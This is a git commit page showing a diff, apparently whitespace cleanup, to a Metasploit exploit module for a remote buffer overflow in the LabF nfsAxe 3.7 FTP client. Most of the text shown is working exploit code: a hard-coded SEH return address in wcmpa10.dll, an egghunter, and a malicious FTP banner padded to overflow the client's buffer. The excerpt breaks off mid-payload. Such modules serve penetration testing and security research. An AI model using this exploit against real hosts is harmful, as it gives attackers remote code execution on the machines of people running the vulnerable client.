Update labf_nfsaxe.rb

MS-2855/keylogger-mettle-extension
Daniel Teixeira 2018-01-05 18:46:33 +00:00 committed by GitHub
parent e7946549d7
commit b97785c7a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 6 deletions


@ -10,14 +10,13 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Seh include Msf::Exploit::Seh
include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::Egghunter
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow', 'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution. This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
}, },
'Author' => 'Author' =>
[ [
'Tulpa', # Original exploit author 'Tulpa', # Original exploit author
'Daniel Teixeira' # MSF module author 'Daniel Teixeira' # MSF module author
@ -34,12 +33,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll [ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
], ],
'Privileged' => false, 'Privileged' => false,
'DefaultOptions' => 'DefaultOptions' =>
{ {
'SRVHOST' => '0.0.0.0', 'SRVHOST' => '0.0.0.0',
}, },
'DisclosureDate' => 'May 15 2017', 'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
@ -65,10 +64,10 @@ class MetasploitModule < Msf::Exploit::Remote
pass = "230 OK.\r\n" pass = "230 OK.\r\n"
client.put(pass) client.put(pass)
client.get_once client.get_once
eggoptions = { :checksum => true } eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
sploit = "220 \"" sploit = "220 \""
sploit << "A"*(9833 - egg.length) sploit << "A"*(9833 - egg.length)
sploit << egg sploit << egg